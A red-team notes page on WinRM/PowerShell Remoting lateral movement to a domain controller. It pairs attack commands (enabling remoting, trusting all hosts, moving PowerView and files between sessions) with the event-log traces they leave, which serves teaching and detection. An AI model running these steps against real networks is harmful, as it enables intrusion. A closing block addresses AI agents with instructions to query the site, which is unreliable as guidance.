# WinRM for Lateral Movement
## Execution
Attacker establishing a PSRemoting session from a compromised system `10.0.0.2` to a domain controller `dc-mantvydas` at `10.0.0.6`:
{% code title="attacker\@10.0.0.2" %}
```csharp
New-PSSession -ComputerName dc-mantvydas -Credential (Get-Credential)
Id Name ComputerName ComputerType State ConfigurationName Availability
-- ---- ------------ ------------ ----- ----------------- ------------
1 Session1 dc-mantvydas RemoteMachine Opened Microsoft.PowerShell Available
PS C:\Users\mantvydas> Enter-PSSession 1
[dc-mantvydas]: PS C:\Users\spotless\Documents> calc.exe
```
{% endcode %}
## Observations
Note the process ancestry:
On the host that initiated the connection, a `4648` logon attempt is logged, showing what process initiated it, the hostname where it connected to and which account was used:
The below graphic shows that the logon events `4648` annd `4624` are being logged on both the system that initiated the connection (`pc-mantvydas - 4648`) and the system that it logged on to (`dc-mantvydas - 4624`):
Additionally, `%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx` on the host that initiated connection to the remote host, logs some interesting data for a task `WSMan Session initialize` :
```markup
-
-
6
0
4
3
1
0x4000000000000002
# connection iniation time
673
# a unique connection ID
# process ID that initiated the connection
Microsoft-Windows-WinRM/Operational
PC-MANTVYDAS.offense.local
-
# remote host the connection was initiated to
dc-mantvydas/wsman?PSVersion=5.1.14409.1005
```
...same as above just in the actual screenshot:
Since we entered into a PS Shell on the remote system `(Enter-PSSession)` , there is another interesting log showing the establishment of a remote shell - note that the ShellID corresponds to the earlier observed `Correlation ActivityID`:
## Additional Useful Commands
[Jules Adriaens](https://twitter.com/@Expl0itabl3) reached out to me and suggested to add the following useful commands, so here they are:
```csharp
# Enable PowerShell Remoting on the target (box needs to be compromised first)
Enable-PSRemoting -force
# Check if a given system is listening on WinRM port
Test-NetConnection -CommonTCPPort WINRM
# Trust all hosts:
Set-Item WSMan:\localhost\Client\TrustedHosts -Value * -Force
# Check what hosts are trusted
Get-Item WSMan:\localhost\Client\TrustedHosts
# Execute command on remote host
Invoke-Command -Credential $cred -ScriptBlock {Hostname}
# Interactive session with explicit credentials
Enter-PSSession -Credential \
# Interactive session using Kerberos:
Enter-PSSession -Authentication Kerberos
# Upload file to remote session
Copy-Item -Path C:\Temp\PowerView.ps1 -Destination C:\Temp\ -ToSession (Get-PSSession)
# Download file from remote session
Copy-Item -Path C:\Users\Administrator\Desktop\test.txt -Destination C:\Temp\ -FromSession (Get-PSSession)
```
## References
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.